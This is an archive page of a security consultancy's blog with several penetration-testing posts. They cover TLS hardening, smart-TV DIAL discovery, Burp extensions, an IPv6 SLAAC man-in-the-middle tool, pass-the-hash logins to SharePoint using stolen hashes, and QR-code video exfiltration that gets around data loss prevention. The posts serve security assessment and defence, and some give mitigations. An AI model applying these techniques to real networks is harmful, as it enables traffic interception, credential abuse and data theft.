Menu

Security Blog

Category Archives: Security Tools

One of the most common findings we discover on assessments is misconfiguration of SSL/TLS implementations. Cryptography is notorious for requiring very specific skills to configure correctly, and on top of that it tends to be a moving target: it seems like every other month there is a new vulnerability specific to SSL/TLS. We find that many organizations become overwhelmed responding to the seemingly constant stream of changes required to maintain a secure web server, or simply throw their hands in the air and stick with a “good enough” configuration that seems to work. However, choosing and using strong TLS configurations doesn’t have to be hard. We wanted to create an easy to digest reference for all your SSL/TLS needs.

We built tlsconfig.neohapsis.com as a living information hub for SSL/TLS secure configurations. We test it regularly against known vulnerabilities and update it accordingly. The configuration examples available on the site will help strengthen your site and will also minimize low and medium risk findings on security assessments. More importantly, by using these configurations that emphasize best practices you can minimize reactionary patches and emergency configuration changes, and reduce time, effort, and risk.

Why Is “Good Enough” Not Good Enough?

Defense in depth is a concept that used a lot in the security world and it is just as important in SSL/TLS. The recent FREAK attack is a prime example of how a known-weak configuration that might currently be classed as a medium or low risk can suddenly become critical, resulting in downtime to fix and a fire drill for your system administrators. Over 12% of the most popular domains had to act quickly to patch the vulnerability which has been a known bad practice for 15 years (in fact, over 8% are still vulnerable and scrambling to update).

This is just one of many examples of the very good reasons that cryptographers are a conservative bunch and regularly deprecate old configurations. In short: proactive, gentle movement to the most current best practice configurations prevents unnecessary emergency maintenance and reduces overall risk.

Old Habits Die Hard

Aspiring for the shiniest new ciphers and configurations may not always be the wisest business decision. Often security best practices can conflict with market realities. Historically, adoption of new web technologies, including SSL/TLS technologies, has been slow; they are usually dependent on either operating system upgrades or hardware purchases, which are costly and rely on the user base willingness to upgrade. The most common reason we hear for use of deprecated cipher suites and weak key strengths is legacy support for Windows XP.

However, since the release of Windows 7, Windows XP has been seeing a steady decline of use across the Internet. By the time Microsoft stopped enterprise support for Windows XP, usage was down to 12.68%. Today usage is down to 7.36% and will only continue to fall. On top of the falling usage of XP, IE 6 usage has flat lined at 0.2% of total browser usage across the Internet. Only 7 years ago, one out of every two browser request was made by IE 6 and it was the driving force on a lot of development decisions. Sites were required to support IE 6 because of it’s wide spread use:today that is no longer the case. So, if your organization has historically made security choices for all users based on the the low bar of XP/IE6 users, now may finally be the right time to revisit that decision. In fact, comparatively strong cryptography choices can still support support browsers back to 2002 while allowing modern systems to take advantage of better ciphers.

Check out the strong, simple baseline configurations available on tlsconfig.neohapsis.com (or see their shiny A+ scanresults on SSLLabs) and learn how you can easily choose modern cryptography for your servers.

This post introduces and describes aspects of “DIAL”, a protocol developed by Google and Netflix for controlling Smart TVs with smart phones and tablets. DIAL provides “second screen” features, which allow users to watch videos and other content on a TV using a smart phone or tablet. This article will review sample code for network discovery and enumerate Smart TV apps using this protocol.

Part 1: Discovery and Enumeration

Smart TVs are similar to other modern devices in that they have apps. Smart TVs normally ship with an app for YouTube(tm), Netflix(tm), as well as many other built-in apps. If you have a smartphone, then maybe you’ve noticed that when your smartphone and TV are on the same network, a small square icon appears in some mobile apps, allowing you to play videos on the big TV. This allows you to control the TV apps from your smartphone. Using this setup, the TV is a “first screen” device, and the phone or tablet functions as a “second screen”, controlling the first screen.

DIAL is the network protocol used for these features and is a standard developed jointly between Google and Netflix. (See http://www.dial-multiscreen.org/ ). DIAL stands for “Discovery and Launch”. This sounds vaguely similar to other network protocols, namely “RPC” (remote procedure call). Basically, DIAL gives devices a way to quickly locate specified networked devices (TVs) and controlling programs (apps) on those devices.

Let’s take a look at the YouTube mobile application to see how exactly this magic happens. Launching the YouTube mobile app with a Smart TV on network (turned on of course) shows the magic square indicating a DIAL-enabled screen is available:

Square appears when YouTube app finds TVs on the network.

Clicking the square provides a selection menu where the user may choose which screen to play YouTube videos. Recent versions of the YouTube apps allow “one touch pairing” which makes all of the setup easy for the user:

Let’s examine the traffic generated by the YouTube mobile app at launch.

The Youtube mobile app send an initial SSDP request, to discover available first-screen devices on the network.

The sent packet is destined for a multicast address (239.255.255.250) on UDP port 1900. Multicast is useful because devices on the local subnet can listen for it, even though it is not specifically sent to them.

The YouTube app multicast packet contains the string “urn:dial-multiscreen-org:service:dial:1”. A Smart TV will respond to this request, telling YouTube mobile app its network address and information about how to access it.

A broadcast search request from the YouTube mobile app looks like this:

Of course, the YouTube app isn’t the only program that can discover ready-to-use Smart TVs. The following is a DIAL discoverer in a few lines of python. It waits 5 seconds for responses from listening TVs. (Note: the request sent in this script is minimal. The DIAL protocol specification has a full request packet example.)

At this point, the YouTube mobile app will try to access the “apps” URL combined with the application name with a GET request to: http:://192.168.1.222:60151/apps/YouTube . A positive response indicates the application is available, and returns an XML document detailing some data about the application state and feature support:

Those of you who have been following along may have noticed how easy this has been. So far, we have sent one UDP packet and issued two GET requests. This has netted us:

The IP address of a Smart TV

The Operating system of a Smart TV (Linux 2.6)

Two listening web services on random high ports.

A RESTful control interface to the TV’s YouTube application.

If only all networked applications/attack surfaces could be discovered this easily. What should we do next? Let’s make a scanner. After getting the current list of all registered application names (as of Sept 18, 2013) from the DIAL website, it is straightforward to create a quick and dirty scanner to find the apps on a Smart TV:

Some of those app names appear pretty interesting. (Note to self: Find all corresponding apps.) The scanner looks for URLs returning positive responses (200 result codes and some XML), and prints them out:

A lot of my work lately has involved assessing web services; some are relatively straightforward REST and SOAP type services, but some of the most interesting and challenging involve varying degrees of additional requirements on top of a vanilla protocol, or entirely proprietary text-based protocols on top of HTTP. Almost without fail, the services require some extra twist in order to interact with them; specially crafted headers, message signing (such as HMAC or AES), message IDs or timestamps, or custom nonces with each request.

These kind of unusual, one-off requirements can really take a chunk out of assessment time. Either the assessor spends a lot of time manually crafting or tampering with requests using existing tools, or spends a lot of time implementing and debugging code to talk to the service, then largely throws it away after the assessment. Neither is very good use of time.

Ideally, we’d like to write the least amount of new code in order to get our existing tools to work with the new service. This is where writing extensions to our preferred tools becomes massively helpful: a very small amount of our own code handles the unusual aspects of the service, and then we’re able to take advantage of all the nice features of the tools we’re used to as well as work almost as quickly as we would on a service that didn’t have the extra proprietary twists.

Getting Started With Burp Extensions

Burp is the de facto standard for professional web app assessments and with the new extension API (released December 2012 in r1.5.01) a lot of complexity in creating Burp extensions went away. Before that the official API was quite limited and several different extension-building-extensions had stepped in to try to fill the gap (such as Hiccup, jython-burp-api, and Buby); each individually was useful, but collectively it all resulted in confusing and contradictory instructions to anyone getting started. Fortunately, the new extension API is good enough that developing directly against it (rather than some intermediate extension) is the way to go.

The official API supports Java, Python, and Ruby equally well. Given the choice I’ll take Python any day, so these instructions will be most applicable to the parseltongues. Getting set up to use or develop extensions is reasonably straightforward (the official Burp instructions do a pretty good job), but there are a few gotchas I’ll try to point out along the way.

Make sure you have a recent version of Burp (at least 1.5.01, but preferably 1.5.04 or later where some of the early bugs were worked out of the extensions support), and a recent version of Java

Download the latest Jython standalone jar. The filename will be something like “jython-standalone-2.7-b1.jar” (Event though the 2.7 branch is in beta I found it plenty stable for my use; make sure to get it so that you can use Python 2.7 features in your extensions.)

In Burp, switch to the Extender tab, then the Options sub-tab. Now, configure the location of the jython jar.

Burp indicates that it’s optional, but go ahead and set the “Folder for loading modules” to your python site-packages directory; that way you’ll be able to make use of any system wide modules in any of your custom extensions (requests, passlib, etc). (NOTE: Some Burp extensions expect that this path will be set to the their own module directory. If you encounter errors like “ImportError: No module named Foo”, simply change the folder for loading modules to point to wherever those modules exist for the extension.)

Note: Because of the way in which Jython and JRuby dynamically generate Java classes, you may encounter memory problems if you load several different Python or Ruby extensions, or if you unload and reload an extension multiple times. If this happens, you will see an error like:

java.lang.OutOfMemoryError: PermGen space

You can avoid this problem by configuring Java to allocate more PermGen storage, by adding a -XX:MaxPermSize option to the command line when starting Burp. For example:

java -XX:MaxPermSize=1G -jar burp.jar

At this point the environment is configured; now it’s time to load an extension. The default one in the official Burp example does nothing (it defines just enough of the interface to load successfully), so we’ll go one step further. Since several of our assessments lately have involved adding some custom header or POST body element (usually for authentication or signing), that seems like a useful direction for a “Hello World”. Here is a simple extension that inserts data (in this case, a timestamp) as a new header field and at the end of the body (as a Gist for formatting). Save it somewhere on disk.

To load it into Burp, open the Extender tab, then the Extensions sub-tab. Click “Add”, and then provide the path to where you downloaded it.

Test it out! Any requests sent from Burp (including Repeater, Intruder, etc) will be modified by the extension. Output is directed to the tabs in the Extender>Extensions view.

A request has been processed and modified by the extension (timestamps added to the header and body of the request). Since Burp doesn’t currently have any way to display what a response looks like after it was edited by an extension, it usually makes sense to output the results to the extension’s tab.

This is a reasonable starting place for developing your own extensions. From here it should be easy to play around with modifying the requests however you like: add or remove headers, parse or modify XML or JSON in the body, etc.

It’s important to remember as you’re developing custom extensions that you’re writing against a Java API. Keep the official Burp API docs handy, and be aware of when you’re manipulating objects from the Java side using Python code. Java to Python coercions in Jython are pretty sensible, but occasionally you run into something unexpected. It sometimes helps to manually take just the member data you need from complex Java objects, rather than figuring out how to pass the whole thing around other python code.

To reload the code and try out changes, simply untick then re-tick the “Loaded” checkbox next to the name of the extension in the Extensions sub-tab (or CTRL-click).

Jython Interactive Console and Developing Custom Extensions

Between the statically-typed Java API and playing around with code in a regular interactive Python session, it’s pretty quick to get most of a custom extension hacked together. However, when something goes wrong, it can be very annoying to not be able to drop into an interactive session and manipulate the actual Burp objects that are causing your extension to bomb.

Fortunately, Marcin Wielgoszewski’s jython-burp-api includes a an interactive Jython console injected into a Burp tab. While I don’t recommend developing new extensions against the unofficial extension-hosting-extensions that were around before the official Burp API (in 1.5.01), access to the Jython tab is a pretty killer feature that stands well on its own.

You can install the jython-burp-api just as with the demo extension in step 6 above. The extension assumes that the “Folder for loading modules” (from step 4 above) is set to its own Lib/ directory. If you get errors such as “ImportError: No module named gds“, then either temporarily change your module folder, or use the solution noted here to have the extension fix up its own path.

Once that’s working, it will add an interactive Jython shell tab into the Burp interface.

This shell was originally intended to work with the classes and objects defined jython-burp-api, but it’s possible to pull back the curtain and get access to the exact same Burp API that you’re developing against in standalone extensions.

Within the pre-defined “Burp” object is a reference to the Callbacks object passed to every extension. From there, you can manually call any of the methods available to an extension. During development and testing of your own extensions, it can be very useful to manually try out code on a particular request (which you can access from the history via getProxyHistory() ). Once you figure out what works, then that code can go into your extension.

Objects from the official Burp Java API can be identified by their lack of help() strings and the obfuscated type names, but python-style exploratory programming still works as expected: the dir() function lists available fields and methods, which correspond to the Burp Java API.

Testing Web Services With Burp and SoapUI

When assessing custom web services, what we often get from customers is simply a spec document, maybe with a few concrete examples peppered throughout; actual working sample code, or real proxy logs are a rare luxury. In these cases, it becomes useful to have an interface that will be able to help craft and replay messages, and easily support variations of the same message (“Message A (as documented in spec)”, “Message A (actually working)”, “testing injections into field x”, “testing parameter overload of field y”, etc). While Burp is excellent at replaying and tampering with existing requests, the Burp interface doesn’t do a great job of helping to craft entirely new messages, or helping keep dozens of different variations organized and documented.

For this task, I turn to a tool familiar to many developers, but rather less known among pentesters: SoapUI. SoapUI calls itself the “swiss army knife of [web service] testing”, and it does a pretty good job of living up to that. By proxying it through Burp (File>Preferences>Proxy Settings) and using Burp extensions to programmatically deal with any additional logic required for the service, you can use the strengths of both and have an excellent environment for security testing against services . SoapUI Pro even includes a variety of web-service specific payloads for security testing.

The main SoapUI interface, populated for penetration testing against a web service. Several variations of a particular service-specific POST message are shown, each demonstrating and providing easy reproducability for a discovered vulnerability.

If the service offers a WSDL or WADL, configuring SoapUI to interact with it is straightforward; simply start a new project, paste in the URL of the endpoint, and hit okay. If the service is a REST service, or some other mechanism over HTTP, you can skip all of the validation checks and simply start manually creating requests by ticking the “Add REST Service” box in the “New SoapUI Project” dialog.

Create, manage, and send arbitrary HTTP requests without a “proper” WSDL or service description by telling SoapUI it’s a REST service.

In addition to helping you create and send requests, I find that the soapUI project file is an invaluable resource for future assessments on the same service; any other tester can pick up right where I left off (even months or years later) by loading my Burp state and my SoapUI project file.

Share Back!

This should be enough to get you up and running with custom Burp extensions to handle unusual service logic, and SoapUI to craft and manage large numbers of example messages and payloads. For Burp, there are a tons of tools out there, including official Burp examples, burpextensions.com, and findable on github. Make sure to share other useful extensions, tools, or tricks in the comments, or hit me up to discuss: @coffeetocode or @neohapsis.

The people that run The Internet have been clamoring for years for increased adoption of IPv6, the next generation Internet Protocol. Modern operating systems, such as Windows 8 and Mac OS X, come out of the box ready and willing to use IPv6, but most networks still have only IPv4. This is a problem because the administrators of those networks may not be expecting any IPv6 activity and only have IPv4 monitoring and defenses in place.

In 2011, Alec Waters wrote a guide on how to take advantage of the fact that Windows Vista and Windows 7 were ‘out of the box’ configured to support IPv6. Dubbed the “SLAAC Attack”, his guide described how to set up a host that advertised itself as an IPv6 router, so that Windows clients would prefer to send their requests to this IPv6 host router first, which would then resend the requests along to the legitimate IPv4 router on their behalf.

This past winter, we at Neohapsis Labs tried to recreate the SLAAC Attack to test it against Windows 8 and make it easy to deploy during our own penetration tests.

We came up with a set of standard packages and accompanying configuration files that worked, then created a script to automate this process, which we call “Sudden Six.” It can quickly create an IPv6 overlay network and the intermediate translation to IPv4 with little more than a base Ubuntu Linux or Kali Linux installation, an available IPv4 address on the target network, and about a minute or so to download and install the packages.

Windows 8 on Sudden Six

As with the SLAAC Attack described by Waters, this works against networks that only have IPv4 connectivity and do not have IPv6 infrastructure and defenses deployed. The attack establishes a transparent IPv6 network on top of the IPv4 infrastructure. Attackers may take advantage of Operating Systems that prefer IPv6 traffic to force those hosts to route their traffic over our IPv6 infrastructure so they can intercept and modify that communication.

To boil it down, attackers can conceivably (and fairly easily) weaponize an attack on our systems simply by leveraging this vulnerability. They could pretend to be an IPv6 router on your network and see all your web traffic, including data being sent to and from your machine. Even more lethal, the attacker could modify web pages to launch client-side attacks, meaning they could create fake websites that look like the ones you are trying to access, but send all data you enter back to the attacker (such as your username and password or credit card number).

As an example, we can imagine this type of attack being used to snoop on web traffic from employees browsing web sites. Even more lethal, the attackers could modify web pages to launch client-side attacks.

The most extreme way to mitigate the attack is to disable IPv6 on client machines. In Windows, this can be accomplished manually in each Network Adapter Properties panel or with GPO. Unfortunately, this would hinder IPv6 adoption. Instead, we would like to see more IPv6 networks being deployed, along with the defenses described in RFC 6105 and the Cisco First Hop Security Implementation Guide. This includes using features such as RA Guard, which allows administrators to configure a trusted switch port that will accept IPv6 Router Advertisement packets, indicating the legitimate IPv6 router.

At DEF CON 21, Brent Bandelgar and Scott Behrens will be presenting this attack as well as recommendations on how to protect your environment. You can find a more detailed abstract of our talk here. The talk will be held during Track 2 on Friday at 2 pm. In addition, on Friday we will be releasing the tool on the Neohapsis Github page.

This is the first post in a series about gathering Web site reconnaissance with PhantomJS.

My first major engagement with Neohapsis involved compiling a Web site survey for a global legal services firm. The client was preparing for a compliance assessment against Article 29 of the EU Data Protection Directive, which details disclosure requirements for user privacy and usage of cookies. The scope of the engagement involved working with their provided list of IP addresses and domain names to validate their active and inactive Web sites and redirects, count how many first party and third party cookies each site placed, identify any login forms, and determine the presence of links to site privacy policy and cookie policy.

The list was extensive and the team had a hard deadline. We had a number of tools at our disposal to scrape Web sites, but as we had a specific set of attributes to look for, we determined that our best bet was to use a modern browser engine to capture fully rendered pages and try to automate the analysis. My colleague, Ben Toews, contributed a script towards this effort that used PhantomJS to visit a text file full of URLs and capture the cookies into another file. PhantomJS is a distribution of WebKit that is intended to run in a “headless” fashion, meaning that it renders Web pages and scripts like Apple Safari or Google Chrome, but without an interactive user interface. Instead, it runs on the command line and exposes an API for JavaScript for command execution. I was able to build on this script to build out a list of active and inactive URLs by checking the status callback from page.open and capture the cookies from every active URL as stored in page.cookies property.

Remember how I said that PhantomJS would render a Web page like Safari or Chrome? This was very important to the project as I needed to capture the Web site attributes in the same way a typical user would encounter the site. We needed to account for redirects from either the Web server or from JavaScript, and any first or third party cookies along the way. As it turns out, PhantomJS provides a way to capture URL changes with the page.OnUrlChanged callback function, which I used to log the redirects and final destination URL. The page.cookies attribute includes all first and third party cookies without any additional work as PhantomJS makes all of the needed requests and script executions already. Check out my version of the script in chs2-basic.coffee.

This is the command invocation. It takes two arguments: a text file with one URL per line and a file name prefix for the output files.

phantomjs chs2-basic.coffee [in.txt] [prefix]

This snippet writes out the cookies into a JSON string and appends it to an output file.

if status is 'success'
# output JSON of cookies from page, one JSON string per line
# format: url:(requested URL from input) pageURL:(resolved Location from the PhantomJS "Address Bar") cookie: object containing cookies set on the page
fs.write system.args[2] + ".jsoncookies", JSON.stringify({url:url,pageURL:page.url,cookie:page.cookies})+"\n", 'a'

In a followup post, I’ll discuss how to capture page headers and detect some common platform stacks.

When assessing a Windows domain environment, the ability to “pass the hash” is invaluable. The technique was pioneered by Paul Ashton way back in ’97, and things have only gotten better since. Fortunately, we no longer need to patch Samba, but have reasonably functional tools like Pass-The-Hash Toolkit and msvctl.

The general aproach of these tools is to not focus on writing PTH versions of every Windows functionality, but rather to allow you to run Windows commands as another user. This means that instead of needing to patch Samba, we can just use msvctl to spawn cmd.exe and from there run the net use command. This aproach has the obvious advantage of requiring far less code.

On a recent enagement, I was attempting to access SharePoint sites using stolen hashes. My first instinct was to launch iexplore.exe using msvctl and to try to browse to the target site. The first thing I learned is that in order to get Internet Explorer to do HTTP NTLM authentication without prompting for credentials, the site you are visiting needs to be in your “Trusted Sites Zone”. Four hours later, when you figure this out, IE will use HTTP NTLM authentication, with the hash specified by msvctl, to authenticate you to the web application. This was all great, except for I was still getting a 401 from the webapp. I authenticated, but the account I was using didn’t have permissions on the SharePoint site. No problem; I have stolen thousands of users’ hashes and one of them must work, right? But what am I going to do, use msvctl to launch a few thousand instances of IE and attempt to browse the the site with each? I think not…

I took the python-ntlm module, which allows for HTTP NTLM with urllib2, and added the ability to provide a hash instead of a password. This can be found here. Then, because urllib2 is one of my least favourite APIs, I decided to write a patch for the requests library to use the python-ntlm library. This fork can be found here. I submitted a pull request to the requests project and commited my change to python-ntlm. Hopefully both of these updates will be available from pip in the near future.

So, what does all this let you do? You can now do pass-the-hash authentication with Python’s request library:

One last thing to keep in mind is that there is a difference between HTTP NTLM authentication and Kerberos HTTP NTLM authentication. This is only for the former.

I can’t say that I’m an expert in Data Loss Prevention (DLP), but I imagine its hard. The basic premise is to prevent employees or others from getting data out of a controlled environment, for example, trying to prevent the DBA from stealing everyone’s credit card numbers or the researcher from walking out the door with millions in trade secrets. DLP is even tougher in light of new techniques for moving confidential data undetected through a network. When I demonstrated how I could do it with QR Codes, I had to rethink DLP protections.

Some quick research informs me that the main techniques for implementing DLP are to monitor and restrict access to data both physically and from networking and endpoint perspectives. Physical controls might consist of putting locks on USB ports or putting an extra locked door between your sensitive environment and the rest of the world. Networking controls might consist of firewalls, IDS, content filtering proxies, or maybe just unplugging the sensitive network from the rest of the network and the internet.

Many security folks joke about the futility of this effort. It seems that a determined individual can always find a way around these mechanisms. To demonstrate, my co-worker, Scott Behrens, was working on a Python script to convert files to a series of QR Codes (2d bar codes) that could be played as a video file. This video could then be recorded and decoded by a cell-phone camera and and stored as files on another computer. However, it seemed to me that with the new JavaScript/HTML5 file APIs, all the work of creating the QR Code videos could be done in the browser, avoiding the need to download a Python script/interpreter.

I was talking with a former co-worker, about this idea and he went off and wrote a HTML5/JS encoder and a ffmpeg/bash/ruby decoder that seemed to work pretty well. Not wanting to be outdone, I kept going and wrote my own encoder and decoder.

My encoder is fairly simple. It uses the file API to read in multiple files from the computer, uses Stuart Knightley’s JSZip library to create a single ZIP file, and then Kazuhiko Arase’s JavaScript QRCode Generator to convert this file into a series of QRCodes. It does this all in the browser without requiring the user to download any programs or transmit any would-be-controlled data over the network.

The decoder was a little bit less straight-forward. I have been wanting to learn about OpenCV for a non-security related side project, so I decided to use it for this. It turns out that it is not very entirely easy to use and its documentation is somewhat lacking. Still, I persevered and wrote a Python tool to:

Pull images from the video and analyze their color.

Identify the spaces between frames of QRCodes (identified by a solid color image).

The tool seems to work pretty well. Between my crummy cellphone camera and some mystery frames that ZBar refuses to decode, it isn’t the most reliable tool for data transfer, but is serves to make a point. Feel free to download both the encoder and decoder from my GitHub Repo or checkout the live demo and let me know what you think. I haven’t done any benchmarking for data bandwidth, but it seems reasonable to use the tool for files several megabytes in size.

To speak briefly about preventing the use of tools like this for getting data of your network: As with most things in security, finding a balance between usability and security is the key. The extreme on the end of usability would be to keep an entirely open network without any controls to prevent or detect data loss. The opposite extreme would be to unplug all your computers and shred their hard drives. Considerations in finding the medium as it relates to DLP include:

The value of your data to your organization.

The value of your data to your adversaries.

The means of your organization to implement security mechanisms.

The means of your adversaries to defeat security mechanisms.

Once your organization has decided what its security posture should be, it can attempt to mitigate risk accordingly. What risk remains must be accepted. For most organizations, the risk presented by a tool like the one described above is acceptable. That being said, techniques for mitigating its risk might include:

Disallowing video capture devices in sensitive areas (already common practice in some organizations).

Writing IDS signatures for the JavaScript used to generate the QRCodes (this is hard because JS is easily obfuscated and packed).

Limiting access within your organization to sensitive information.

Trying to prevent the QRCode-creating portion of the tool from reaching your computers.